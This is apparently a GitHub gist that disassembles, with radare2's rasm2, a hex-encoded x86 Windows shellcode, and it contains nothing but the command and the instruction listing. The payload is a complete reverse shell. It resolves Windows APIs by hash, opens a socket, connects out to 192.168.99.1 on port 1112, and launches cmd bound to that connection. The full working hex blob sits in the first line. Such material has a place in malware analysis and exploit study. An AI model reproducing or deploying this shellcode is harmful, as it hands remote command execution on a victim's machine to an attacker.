Created
August 25, 2018 02:11
-
-
Save pich4ya/71d12314111878c1d2bcbdcad20f5d52 to your computer and use it in GitHub Desktop.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| $ rasm2 -a x86 -D 'fce8820000006089e531c0648b50308b520c8b52148b72280fb74a2631ffac3c617c022c20c1cf0d01c7e2f252578b52108b4a3c8b4c1178e34801d1518b592001d38b4918e33a498b348b01d631ffacc1cf0d01c738e075f6037df83b7d2475e4588b582401d3668b0c4b8b581c01d38b048b01d0894424245b5b61595a51ffe05f5f5a8b12eb8d5d6833320000687773325f54684c772607ffd5b89001000029c454506829806b00ffd5505050504050405068ea0fdfe0ffd5976a0568c0a86301680200045889e66a1056576899a57461ffd585c0740cff4e0875ec68f0b5a256ffd568636d640089e357575731f66a125956e2fd66c744243c01018d442410c60044545056565646564e565653566879cc3f86ffd589e04e5646ff306808871d60ffd5bbf0b5a25668a695bd9dffd53c067c0a80fbe07505bb4713726f6a0053ffd5' | |
| 0x00000000 1 fc cld | |
| 0x00000001 5 e882000000 call 0x88 | |
| 0x00000006 1 60 pushal | |
| 0x00000007 2 89e5 mov ebp, esp | |
| 0x00000009 2 31c0 xor eax, eax | |
| 0x0000000b 4 648b5030 mov edx, dword fs:[eax + 0x30] | |
| 0x0000000f 3 8b520c mov edx, dword [edx + 0xc] | |
| 0x00000012 3 8b5214 mov edx, dword [edx + 0x14] | |
| 0x00000015 3 8b7228 mov esi, dword [edx + 0x28] | |
| 0x00000018 4 0fb74a26 movzx ecx, word [edx + 0x26] | |
| 0x0000001c 2 31ff xor edi, edi | |
| 0x0000001e 1 ac lodsb al, byte [esi] | |
| 0x0000001f 2 3c61 cmp al, 0x61 | |
| 0x00000021 2 7c02 jl 0x25 | |
| 0x00000023 2 2c20 sub al, 0x20 | |
| 0x00000025 3 c1cf0d ror edi, 0xd | |
| 0x00000028 2 01c7 add edi, eax | |
| 0x0000002a 2 e2f2 loop 0x1e | |
| 0x0000002c 1 52 push edx | |
| 0x0000002d 1 57 push edi | |
| 0x0000002e 3 8b5210 mov edx, dword [edx + 0x10] | |
| 0x00000031 3 8b4a3c mov ecx, dword [edx + 0x3c] | |
| 0x00000034 4 8b4c1178 mov ecx, dword [ecx + edx + 0x78] | |
| 0x00000038 2 e348 jecxz 0x82 | |
| 0x0000003a 2 01d1 add ecx, edx | |
| 0x0000003c 1 51 push ecx | |
| 0x0000003d 3 8b5920 mov ebx, dword [ecx + 0x20] | |
| 0x00000040 2 01d3 add ebx, edx | |
| 0x00000042 3 8b4918 mov ecx, dword [ecx + 0x18] | |
| 0x00000045 2 e33a jecxz 0x81 | |
| 0x00000047 1 49 dec ecx | |
| 0x00000048 3 8b348b mov esi, dword [ebx + ecx*4] | |
| 0x0000004b 2 01d6 add esi, edx | |
| 0x0000004d 2 31ff xor edi, edi | |
| 0x0000004f 1 ac lodsb al, byte [esi] | |
| 0x00000050 3 c1cf0d ror edi, 0xd | |
| 0x00000053 2 01c7 add edi, eax | |
| 0x00000055 2 38e0 cmp al, ah | |
| 0x00000057 2 75f6 jne 0x4f | |
| 0x00000059 3 037df8 add edi, dword [ebp - 8] | |
| 0x0000005c 3 3b7d24 cmp edi, dword [ebp + 0x24] | |
| 0x0000005f 2 75e4 jne 0x45 | |
| 0x00000061 1 58 pop eax | |
| 0x00000062 3 8b5824 mov ebx, dword [eax + 0x24] | |
| 0x00000065 2 01d3 add ebx, edx | |
| 0x00000067 4 668b0c4b mov cx, word [ebx + ecx*2] | |
| 0x0000006b 3 8b581c mov ebx, dword [eax + 0x1c] | |
| 0x0000006e 2 01d3 add ebx, edx | |
| 0x00000070 3 8b048b mov eax, dword [ebx + ecx*4] | |
| 0x00000073 2 01d0 add eax, edx | |
| 0x00000075 4 89442424 mov dword [esp + 0x24], eax | |
| 0x00000079 1 5b pop ebx | |
| 0x0000007a 1 5b pop ebx | |
| 0x0000007b 1 61 popal | |
| 0x0000007c 1 59 pop ecx | |
| 0x0000007d 1 5a pop edx | |
| 0x0000007e 1 51 push ecx | |
| 0x0000007f 2 ffe0 jmp eax | |
| 0x00000081 1 5f pop edi | |
| 0x00000082 1 5f pop edi | |
| 0x00000083 1 5a pop edx | |
| 0x00000084 2 8b12 mov edx, dword [edx] | |
| 0x00000086 2 eb8d jmp 0x15 | |
| 0x00000088 1 5d pop ebp | |
| 0x00000089 5 6833320000 push 0x3233 | |
| 0x0000008e 5 687773325f push 0x5f327377 | |
| 0x00000093 1 54 push esp | |
| 0x00000094 5 684c772607 push 0x726774c | |
| 0x00000099 2 ffd5 call ebp | |
| 0x0000009b 5 b890010000 mov eax, 0x190 | |
| 0x000000a0 2 29c4 sub esp, eax | |
| 0x000000a2 1 54 push esp | |
| 0x000000a3 1 50 push eax | |
| 0x000000a4 5 6829806b00 push 0x6b8029 | |
| 0x000000a9 2 ffd5 call ebp | |
| 0x000000ab 1 50 push eax | |
| 0x000000ac 1 50 push eax | |
| 0x000000ad 1 50 push eax | |
| 0x000000ae 1 50 push eax | |
| 0x000000af 1 40 inc eax | |
| 0x000000b0 1 50 push eax | |
| 0x000000b1 1 40 inc eax | |
| 0x000000b2 1 50 push eax | |
| 0x000000b3 5 68ea0fdfe0 push 0xe0df0fea | |
| 0x000000b8 2 ffd5 call ebp | |
| 0x000000ba 1 97 xchg eax, edi | |
| 0x000000bb 2 6a05 push 5 | |
| 0x000000bd 5 68c0a86301 push 0x163a8c0 | |
| 0x000000c2 5 6802000458 push 0x58040002 | |
| 0x000000c7 2 89e6 mov esi, esp | |
| 0x000000c9 2 6a10 push 0x10 | |
| 0x000000cb 1 56 push esi | |
| 0x000000cc 1 57 push edi | |
| 0x000000cd 5 6899a57461 push 0x6174a599 | |
| 0x000000d2 2 ffd5 call ebp | |
| 0x000000d4 2 85c0 test eax, eax | |
| 0x000000d6 2 740c je 0xe4 | |
| 0x000000d8 3 ff4e08 dec dword [esi + 8] | |
| 0x000000db 2 75ec jne 0xc9 | |
| 0x000000dd 5 68f0b5a256 push 0x56a2b5f0 | |
| 0x000000e2 2 ffd5 call ebp | |
| 0x000000e4 5 68636d6400 push 0x646d63 | |
| 0x000000e9 2 89e3 mov ebx, esp | |
| 0x000000eb 1 57 push edi | |
| 0x000000ec 1 57 push edi | |
| 0x000000ed 1 57 push edi | |
| 0x000000ee 2 31f6 xor esi, esi | |
| 0x000000f0 2 6a12 push 0x12 | |
| 0x000000f2 1 59 pop ecx | |
| 0x000000f3 1 56 push esi | |
| 0x000000f4 2 e2fd loop 0xf3 | |
| 0x000000f6 7 66c744243c0101 mov word [esp + 0x3c], 0x101 | |
| 0x000000fd 4 8d442410 lea eax, [esp + 0x10] | |
| 0x00000101 3 c60044 mov byte [eax], 0x44 | |
| 0x00000104 1 54 push esp | |
| 0x00000105 1 50 push eax | |
| 0x00000106 1 56 push esi | |
| 0x00000107 1 56 push esi | |
| 0x00000108 1 56 push esi | |
| 0x00000109 1 46 inc esi | |
| 0x0000010a 1 56 push esi | |
| 0x0000010b 1 4e dec esi | |
| 0x0000010c 1 56 push esi | |
| 0x0000010d 1 56 push esi | |
| 0x0000010e 1 53 push ebx | |
| 0x0000010f 1 56 push esi | |
| 0x00000110 5 6879cc3f86 push 0x863fcc79 | |
| 0x00000115 2 ffd5 call ebp | |
| 0x00000117 2 89e0 mov eax, esp | |
| 0x00000119 1 4e dec esi | |
| 0x0000011a 1 56 push esi | |
| 0x0000011b 1 46 inc esi | |
| 0x0000011c 2 ff30 push dword [eax] | |
| 0x0000011e 5 6808871d60 push 0x601d8708 | |
| 0x00000123 2 ffd5 call ebp | |
| 0x00000125 5 bbf0b5a256 mov ebx, 0x56a2b5f0 | |
| 0x0000012a 5 68a695bd9d push 0x9dbd95a6 | |
| 0x0000012f 2 ffd5 call ebp | |
| 0x00000131 2 3c06 cmp al, 6 | |
| 0x00000133 2 7c0a jl 0x13f | |
| 0x00000135 3 80fbe0 cmp bl, 0xe0 | |
| 0x00000138 2 7505 jne 0x13f | |
| 0x0000013a 5 bb4713726f mov ebx, 0x6f721347 | |
| 0x0000013f 2 6a00 push 0 | |
| 0x00000141 1 53 push ebx | |
| 0x00000142 2 ffd5 call ebp |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment